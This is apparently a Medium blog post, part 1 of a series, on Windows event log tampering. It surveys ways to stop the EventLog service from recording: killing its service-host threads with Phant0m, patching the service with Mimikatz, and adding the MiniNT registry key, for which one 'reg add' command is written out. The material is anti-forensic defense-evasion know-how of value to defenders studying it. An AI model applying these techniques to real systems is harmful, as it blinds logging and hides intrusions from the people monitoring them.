Event Log Tampering Part 1: Disrupting the EventLog Service

You Can’t See Me
  • Patching the Event Service (Mimikatz)
  • Downgrading Windows Components (Adding MiniNT key)
  • Event Record Unreferencing (Shadow Brokers Tools DanderSpritz/eventlogedit)
  • Rewriting Logs with WinAPI EvtExportLog (3gstudent’s evolutions of eventlogedit)

Disrupting the EventLog Service

The goal of the methods I will go over below are to impact the service responsible for Event Logging that will result in no logs recorded. This will leave a hole in your timelines or be used to clear the event log without being recorded.

Service Host Thread Tampering

Let’s quickly have a look at how the EventLog service runs. Each service will be associated with an instance of svchost.exe so we need to find which one EventLog uses.

A time gap in logs from where I started Phant0m and restarted the service.

Patching the Event Service

Mimikatz currently has a module to be able to patch the event log service and then clear the log.

Downgrading Windows Components

The existence of the MiniNT registry key will result in various Windows components thinking the environment is WinPE (Preinstallation Environment).

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt”

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store